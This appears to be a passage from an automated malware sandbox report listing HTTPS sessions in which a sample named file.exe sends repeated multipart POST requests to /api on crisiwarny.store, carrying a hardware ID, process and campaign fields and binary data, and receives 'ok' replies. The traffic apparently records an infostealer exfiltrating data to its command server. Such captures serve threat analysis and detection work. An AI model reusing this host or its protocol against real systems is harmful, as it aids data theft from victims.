                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 50 63 58 41 76 48 4c 75 43 6c 70 66 4e 52 75 58 68 62 77 51 35 31 78 52 6e 54 4a 2b 56 4f 62 61 36 70 51 4f 6d 47 6c 42 73 53 46 36 6c 49 58 2b 49 4c 73 5a 53 55 37 6c 47 4a 4d 55 71 67 45 76 33 4e 54 63 4f 58 33 52 5a 67 6c 73 68 6f 76 4b 4b 38 4d 68 4e 71 75 55 41 44 31 67 4f 5a 68 5a 57 66 52 61 31 38 54 2b 6b 4b 52 65 55 6c 31 79 76 56 55 6c 32 6d 74 55 7a 46 36 75 67 58 43 6b 4f 51 58 53 37 32 4d 2b 43 6b 39 4e 65 4a 31 51 77 50 6d 42 71 56 33 53 33 33 4e 34 68 53 4f 4b 37 51 55 4d 57 54 6f 57 49 53 4a 37 6c 73 43 39 59 33 6b 59 57 70 36 33 58 64 56 48 76 35 57 6c 33 52 4d 66 63 58 34 58 5a 78 69 6f 46 38 38 5a 61 77 48 78 63 4b 67 46 77 4c 6c 79 37 67 70 55 32 58 5a 61 58 6f 5a 2f 45 33 51 61 77 74 71 69 76 4e 59 30 54 33 74 55 44 70 67 6f 67 2f 4e
                                                                                  Data Ascii: PcXAvHLuClpfNRuXhbwQ51xRnTJ+VOba6pQOmGlBsSF6lIX+ILsZSU7lGJMUqgEv3NTcOX3RZglshovKK8MhNquUAD1gOZhZWfRa18T+kKReUl1yvVUl2mtUzF6ugXCkOQXS72M+Ck9NeJ1QwPmBqV3S33N4hSOK7QUMWToWISJ7lsC9Y3kYWp63XdVHv5Wl3RMfcX4XZxioF88ZawHxcKgFwLly7gpU2XZaXoZ/E3QawtqivNY0T3tUDpgog/N
                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 4c 35 6a 65 38 70 4b 7a 58 54 66 52 52 4b 73 47 75 33 51 51 64 53 38 4c 52 4c 33 33 7a 74 55 7a 6f 6f 38 45 44 49 67 65 4a 66 43 76 75 43 37 47 4e 73 66 74 68 75 55 42 37 35 51 5a 5a 31 51 48 62 4c 38 46 69 62 59 36 35 58 4f 57 65 6e 43 49 54 4d 72 6c 41 64 76 64 4f 67 54 48 4a 2b 32 6d 4d 55 44 62 35 64 30 48 4e 4a 4d 35 4b 30 57 4a 68 6a 71 31 45 36 61 61 34 49 77 59 72 71 56 67 50 37 69 4f 39 74 59 48 54 62 59 56 67 63 2b 6b 57 52 65 45 35 38 77 66 45 55 33 79 57 71 54 48 59 77 36 44 48 48 6c 50 6c 48 43 62 32 55 72 6e 41 6c 63 74 67 6c 44 46 4c 78 56 70 70 2b 53 33 62 46 38 56 65 65 59 71 42 53 4f 6d 4b 68 43 4d 4b 4e 35 30 55 47 38 59 58 6e 5a 32 6c 37 32 57 39 58 48 37 41 4b 30 48 4e 64 4d 35 4b 30 65 4a 5a 6f 67 31 38 36 62 2b 67 66 69 70 75 75 55
                                                                                  Data Ascii: L5je8pKzXTfRRKsGu3QQdS8LRL33ztUzoo8EDIgeJfCvuC7GNsfthuUB75QZZ1QHbL8FibY65XOWenCITMrlAdvdOgTHJ+2mMUDb5d0HNJM5K0WJhjq1E6aa4IwYrqVgP7iO9tYHTbYVgc+kWReE58wfEU3yWqTHYw6DHHlPlHCb2UrnAlctglDFLxVpp+S3bF8VeeYqBSOmKhCMKN50UG8YXnZ2l72W9XH7AK0HNdM5K0eJZog186b+gfipuuU
                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 67 4d 53 56 44 30 33 56 45 45 62 4a 31 68 6e 64 54 65 4d 66 34 46 49 34 72 74 42 51 78 5a 4f 68 59 68 49 54 68 58 67 62 79 69 75 6c 6c 61 48 44 64 59 46 55 55 39 45 36 61 64 45 4e 31 79 2f 46 65 6b 6d 53 6e 58 54 46 67 72 77 50 57 77 71 41 58 41 75 58 4c 75 43 6c 4d 63 73 5a 72 52 46 4c 76 43 6f 6b 30 51 6e 2b 4b 72 42 53 56 62 36 4a 51 4d 57 53 75 42 63 4b 50 37 31 67 45 2f 59 54 6b 59 6d 78 7a 31 57 68 52 48 2f 52 57 6d 6e 39 4b 66 38 50 34 57 64 45 72 37 56 4d 75 4b 50 42 41 39 59 2f 67 57 51 4c 72 79 2f 38 6e 66 44 58 54 61 52 52 4b 73 45 57 63 65 30 5a 38 79 66 64 56 6d 33 65 2f 57 44 39 67 72 51 7a 50 6a 4f 68 46 41 2f 4b 43 34 32 70 73 63 74 78 70 58 68 48 33 42 4e 34 30 51 6d 75 4b 72 42 53 79 63 72 31 5a 64 6e 66 6d 47 59 53 46 34 68 64 64 76 59
                                                                                  Data Ascii: gMSVD03VEEbJ1hndTeMf4FI4rtBQxZOhYhIThXgbyiullaHDdYFUU9E6adEN1y/FekmSnXTFgrwPWwqAXAuXLuClMcsZrRFLvCok0Qn+KrBSVb6JQMWSuBcKP71gE/YTkYmxz1WhRH/RWmn9Kf8P4WdEr7VMuKPBA9Y/gWQLry/8nfDXTaRRKsEWce0Z8yfdVm3e/WD9grQzPjOhFA/KC42psctxpXhH3BN40QmuKrBSycr1ZdnfmGYSF4hddvY
                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 65 74 74 73 58 52 62 34 52 35 42 77 51 58 54 50 39 31 69 61 59 71 35 62 4d 6d 47 6d 43 63 76 43 6f 42 63 43 35 63 75 34 4b 55 52 75 31 32 6c 5a 55 75 38 4b 69 54 52 43 66 34 71 73 46 4a 31 72 71 46 51 38 62 71 77 46 77 6f 6a 72 56 77 37 2b 68 4f 52 76 59 58 72 55 62 6c 30 54 39 6b 47 61 66 30 4e 2b 79 66 4a 53 30 53 76 74 55 79 34 6f 38 45 44 6b 6d 65 4e 62 41 72 32 55 72 6e 41 6c 63 74 67 6c 44 46 4c 37 53 4a 52 7a 52 58 37 4a 2f 46 47 56 62 36 68 55 50 6e 71 67 41 4d 4f 51 2f 46 63 4d 2b 49 66 6a 61 57 46 7a 33 57 4e 58 46 72 41 4b 30 48 4e 64 4d 35 4b 30 65 5a 31 69 68 46 4d 74 4b 4c 64 4f 33 63 4c 70 57 30 57 6c 79 2b 46 69 62 33 72 5a 5a 6c 49 52 2b 30 47 61 64 55 4a 37 78 2b 5a 58 6e 6d 71 70 56 44 6c 75 72 67 48 4c 68 4f 6c 65 42 50 57 4d 6f 43 63
                                                                                  Data Ascii: ettsXRb4R5BwQXTP91iaYq5bMmGmCcvCoBcC5cu4KURu12lZUu8KiTRCf4qsFJ1rqFQ8bqwFwojrVw7+hORvYXrUbl0T9kGaf0N+yfJS0SvtUy4o8EDkmeNbAr2UrnAlctglDFL7SJRzRX7J/FGVb6hUPnqgAMOQ/FcM+IfjaWFz3WNXFrAK0HNdM5K0eZ1ihFMtKLdO3cLpW0Wly+Fib3rZZlIR+0GadUJ7x+ZXnmqpVDlurgHLhOleBPWMoCc
                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 31 34 56 34 45 4f 48 65 77 55 39 69 76 73 55 79 56 7a 74 58 54 46 7a 75 52 62 4a 6b 75 6b 58 4f 72 50 4c 2b 43 6b 39 4e 65 46 6d 57 68 7a 33 55 6f 45 35 59 6d 58 41 38 30 53 57 63 71 49 55 65 43 69 75 51 4a 7a 52 6f 42 63 42 37 4d 75 34 4f 54 63 75 67 54 59 44 51 71 4a 62 33 6d 30 46 5a 59 71 73 42 74 38 6c 76 78 52 75 4b 4f 38 44 31 70 44 6f 56 42 50 2b 7a 4e 35 58 51 6d 2f 5a 59 30 4d 44 7a 6e 71 58 62 6b 68 31 33 65 55 59 68 47 61 6a 57 6a 46 2b 36 45 36 45 6a 61 34 50 50 4c 33 44 6f 46 59 72 4e 63 77 6c 44 46 4c 46 52 35 35 36 51 6d 58 62 75 58 4f 4c 61 4b 74 44 4a 79 6a 6d 51 4d 4c 43 74 67 64 4c 76 59 2f 78 4b 54 30 6c 68 6a 34 42 51 61 63 55 77 6d 73 4c 61 6f 72 69 46 4d 6b 33 34 78 51 6b 4b 50 42 41 67 34 48 38 52 51 50 2b 6e 65 4d 75 57 30 76 36
                                                                                  Data Ascii: 14V4EOHewU9ivsUyVztXTFzuRbJkukXOrPL+Ck9NeFmWhz3UoE5YmXA80SWcqIUeCiuQJzRoBcB7Mu4OTcugTYDQqJb3m0FZYqsBt8lvxRuKO8D1pDoVBP+zN5XQm/ZY0MDznqXbkh13eUYhGajWjF+6E6Eja4PPL3DoFYrNcwlDFLFR556QmXbuXOLaKtDJyjmQMLCtgdLvY/xKT0lhj4BQacUwmsLaoriFMk34xQkKPBAg4H8RQP+neMuW0v6
                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 4e 4b 6e 6e 4e 54 59 6f 66 54 57 70 5a 6b 75 30 51 68 5a 2b 68 4f 68 49 53 75 44 31 65 7a 79 2b 52 34 4a 53 32 45 4e 77 39 48 6f 78 50 41 4a 6c 6f 39 30 37 52 43 30 54 33 2f 47 6e 5a 36 36 46 69 45 78 65 31 46 46 2f 75 49 39 6d 6f 69 53 2b 70 43 57 68 58 78 55 6f 42 6a 53 6a 7a 6b 77 6e 57 76 57 37 68 58 4f 47 61 76 46 74 58 43 6f 42 63 4b 76 64 50 5a 4b 53 30 31 36 79 73 55 43 72 41 63 30 45 46 47 66 63 54 7a 51 6f 41 6f 69 6c 6f 78 61 62 34 51 30 34 32 68 65 54 50 63 79 36 34 70 59 7a 57 4d 4e 78 70 53 39 46 58 51 4c 42 55 68 6b 61 45 48 78 6a 58 2f 53 33 68 78 36 42 61 45 32 72 77 5a 52 65 2f 4c 75 43 6b 69 64 73 5a 33 55 68 48 6d 52 39 64 4b 65 31 54 45 38 31 57 48 64 61 42 59 46 32 75 35 43 76 71 38 2b 31 51 4c 38 34 7a 32 65 43 55 37 6c 47 6f 55 53
                                                                                  Data Ascii: NKnnNTYofTWpZku0QhZ+hOhISuD1ezy+R4JS2ENw9HoxPAJlo907RC0T3/GnZ66FiExe1FF/uI9moiS+pCWhXxUoBjSjzkwnWvW7hXOGavFtXCoBcKvdPZKS016ysUCrAc0EFGfcTzQoAoiloxab4Q042heTPcy64pYzWMNxpS9FXQLBUhkaEHxjX/S3hx6BaE2rwZRe/LuCkidsZ3UhHmR9dKe1TE81WHdaBYF2u5Cvq8+1QL84z2eCU7lGoUS
                                                                                  2024-10-27 07:52:13 UTC1369INData Raw: 33 56 58 54 30 79 6e 6d 44 59 72 31 58 64 45 53 76 44 63 69 38 30 47 41 55 2b 70 75 69 54 32 5a 6a 31 79 55 61 55 75 67 45 79 44 52 6f 59 63 33 6b 56 39 4e 4a 71 6c 6b 36 4b 4c 64 4f 33 63 4c 34 46 31 32 75 78 61 42 37 4a 53 32 55 49 6c 63 41 34 6b 4b 54 59 6b 59 30 39 4d 70 35 67 32 4b 39 56 33 52 5a 70 51 54 53 6c 2b 31 48 41 73 4f 31 7a 58 74 69 5a 64 63 6e 63 53 69 79 64 59 5a 33 52 58 33 4e 74 42 72 52 66 65 30 4d 64 6b 57 36 42 39 53 42 72 48 49 2f 76 37 72 32 61 6d 56 37 30 79 56 4c 58 4f 6b 45 68 6a 51 64 49 49 53 30 52 74 45 39 37 52 4d 34 5a 61 6b 44 79 6f 48 38 52 51 50 2b 6e 65 4d 75 57 30 76 37 62 6c 55 43 2f 56 57 64 63 46 4e 4e 39 4e 4e 53 6c 47 4b 54 61 67 46 35 72 78 43 47 70 4f 31 42 42 72 33 46 6f 48 45 6c 4c 5a 52 43 55 68 66 33 42 4e
                                                                                  Data Ascii: 3VXT0ynmDYr1XdESvDci80GAU+puiT2Zj1yUaUugEyDRoYc3kV9NJqlk6KLdO3cL4F12uxaB7JS2UIlcA4kKTYkY09Mp5g2K9V3RZpQTSl+1HAsO1zXtiZdcncSiydYZ3RX3NtBrRfe0MdkW6B9SBrHI/v7r2amV70yVLXOkEhjQdIIS0RtE97RM4ZakDyoH8RQP+neMuW0v7blUC/VWdcFNN9NNSlGKTagF5rxCGpO1BBr3FoHElLZRCUhf3BN


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.749703104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:14 UTC282OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12849
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:14 UTC12849OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 33 30 34 46 44 41 32 44 41 39 32 41 33 44 37 42 45 31 38 30 32 44 41 38 46 42 32 39 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"935304FDA2DA92A3D7BE1802DA8FB29D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-27 07:52:15 UTC1012INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=3iq380pb4ehaf5s1sfukic6085; expires=Thu, 20 Feb 2025 01:38:54 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPlUBRE4AmTUUxZnNUlFI71j4J9SNLm2KyXv%2B5%2FwmKN%2FmgdGmmUsaplCrQiIGXC8ByiaUwmFnVGRpAUiohDGQcT%2BzL6Xj5S8Tc39BZpT6IZ3PawjF433xQ3A6vhtQd8sgSOy"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911b042f49e5ca-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1288&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13789&delivery_rate=2193939&cwnd=251&unsent_bytes=0&cid=7f591c2086ec3ab8&ts=584&x=0"
                                                                                  2024-10-27 07:52:15 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.90
                                                                                  2024-10-27 07:52:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.749709104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:16 UTC282OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15081
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:16 UTC15081OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 33 30 34 46 44 41 32 44 41 39 32 41 33 44 37 42 45 31 38 30 32 44 41 38 46 42 32 39 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"935304FDA2DA92A3D7BE1802DA8FB29D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-27 07:52:17 UTC1013INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=t9v6n8l8kt1dcu5e9rkkb0v5tm; expires=Thu, 20 Feb 2025 01:38:56 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yfVQVQ23%2FpMQdcnuBVvUi7dd%2BgkQHmeMOYz8fu7GSLImQc0F9mqsOb%2BK8lEhozFxT5XiyhQgpRfGuEPdgHnDcw%2F5pD0xNtp6lvkqETW5Y3aUl5IvOkSQmUlE7zxqnXeFGZ6L"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911b1179f32e69-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1593&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16021&delivery_rate=1806612&cwnd=251&unsent_bytes=0&cid=b6264dc819b6bc91&ts=440&x=0"
                                                                                  2024-10-27 07:52:17 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.90
                                                                                  2024-10-27 07:52:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.749720104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:18 UTC282OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 20406
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:18 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 33 30 34 46 44 41 32 44 41 39 32 41 33 44 37 42 45 31 38 30 32 44 41 38 46 42 32 39 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"935304FDA2DA92A3D7BE1802DA8FB29D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-27 07:52:18 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d
                                                                                  Data Ascii: (X6K~`iO\_,mi`m?ls}Qm
                                                                                  2024-10-27 07:52:19 UTC1012INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=p4f2d1imdq6cvgemd1rs6miq7n; expires=Thu, 20 Feb 2025 01:38:57 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LxdGMdNUflTE39lfrnpav8e3ZAnQtO0sJ5psHQruY7D3Gfgk0uTgLMqXG7yB7VlithT5O1fTmUV9Nnr21vQeB35Wj%2FUxXCggfzs%2BCNqHK1UK%2BhRImf0uH4Ikz2dk3TuPgvT"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911b19599f6c39-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1217&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21368&delivery_rate=2445945&cwnd=235&unsent_bytes=0&cid=52599663fad48ac3&ts=1042&x=0"
                                                                                  2024-10-27 07:52:19 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.90
                                                                                  2024-10-27 07:52:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.749731104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:20 UTC281OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1244
                                                                                  Host: crisiwarny.store
                                                                                  2024-10-27 07:52:20 UTC1244OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 35 33 30 34 46 44 41 32 44 41 39 32 41 33 44 37 42 45 31 38 30 32 44 41 38 46 42 32 39 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"935304FDA2DA92A3D7BE1802DA8FB29D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-27 07:52:20 UTC1020INHTTP/1.1 200 OK
                                                                                  Date: Sun, 27 Oct 2024 07:52:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=q5t33u0b2rkmq2n151ticudgt9; expires=Thu, 20 Feb 2025 01:38:59 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbNOCX1ziBjhUI7Ezt0yVlnEzS98NeOq2VKmlbccOS4TZrmLTauk%2FhLy5PfijQCFJCe0c82W5e%2FJ%2B4m%2FrpDjQdsi6yegZBDDy%2Fs7EkT00%2B%2BGnPQk0xhQQEIPeJvk%2B52wtTTN"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8d911b25ca40e83f-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2161&delivery_rate=2195602&cwnd=251&unsent_bytes=0&cid=aba292bd471466e8&ts=536&x=0"
                                                                                  2024-10-27 07:52:20 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.90
                                                                                  2024-10-27 07:52:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.749742104.21.95.914437160C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-27 07:52:21 UTC283OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
